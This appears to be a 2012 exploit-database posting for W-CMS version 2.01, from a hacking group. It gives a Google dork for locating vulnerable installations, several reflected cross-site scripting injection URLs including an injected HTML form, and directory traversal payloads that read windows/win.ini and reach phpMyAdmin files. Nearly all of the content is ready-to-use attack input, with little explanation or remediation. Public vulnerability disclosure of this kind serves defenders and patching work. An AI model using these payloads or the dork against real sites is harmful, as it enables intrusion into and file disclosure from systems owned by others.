43 lines
No EOL
1.5 KiB
Text
43 lines
No EOL
1.5 KiB
Text
# Exploit Title: W-Cms Multiple Vulnerability
|
|
# Date: 2012-01-09
|
|
# Author: th3.g4m3_0v3r
|
|
# Site:http://w-cms.info/
|
|
# Software Link: http://code.google.com/p/wcms/
|
|
# Dork: intext:"Powered by w-CMS"
|
|
# Version : [2.01]
|
|
# Tested on: Window 7
|
|
# Yogesh Kashyap, shubneet goel, w4rl0ck.d0wn, Chip, VzAcnY, Razzy, Sayan, Jaggi Panu, Darkgt
|
|
# www.h4ck3r.in, www.root-team.com, www.hackingmind.com, www.hackingcrackingtricks.in
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
www.h4ck3r.in www.root-team.com www.hackingmind.com
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
W-CMS cross site scripting
|
|
_______________
|
|
|
|
Vulnerable Link __________\/_____________________
|
|
_______________
|
|
|
|
http://localhost/index.php?bid=1&COMMENT=1 "XSS"
|
|
http://localhost/?p=3"XSS"
|
|
http://localhost/?bid=5&p=1"XSS"
|
|
|
|
|
|
http://localhost/?p=3<FORM action="Default.asp?PageId=-1"
|
|
method=POST id=searchFORMname=searchFORM
|
|
style="margin:0;padding:0"><INPUT type="hidden" value=""
|
|
name="txtSEARCH"></FORM>
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
directory traversal attacks
|
|
|
|
This script is possibly vulnerable to directory traversal attacks
|
|
|
|
http://localhost/wcms-2.01_2/?p=../../../../../../../../../../windows/win.ini
|
|
http://localhost/wcms-2.01_2/?p=../../../../../phpMyAdmin/db_create.php
|
|
|
|
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Greetz To : 1337day.com ~ exploit-db.com ~ hackforums.net |